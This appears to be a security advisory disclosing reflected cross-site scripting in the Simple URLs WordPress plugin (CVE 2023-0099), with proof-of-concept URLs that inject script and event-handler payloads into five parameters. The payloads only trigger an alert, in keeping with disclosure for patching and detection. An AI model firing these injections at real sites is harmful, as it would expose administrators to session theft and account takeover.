Simple URLs < 115 – Multiple Reflected XSS | CVE 2023-0099

Description

The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

Proof of Concept

https://example.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=</script><svg/onload=alert(/XSS/)>
https://example.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?filter=</script><svg/onload=alert(/XSS/)>
https://example.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?post_id=</script><svg/onload=alert(/XSS/)>
https://example.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?keyword=</script><svg/onload=alert(/XSS/)>

https://example.com/wp-admin/edit.php?post_type=surl&page=surl-dashboard&link-search-input=" style=animation-name:rotation onanimationstart=alert(/XSS/)//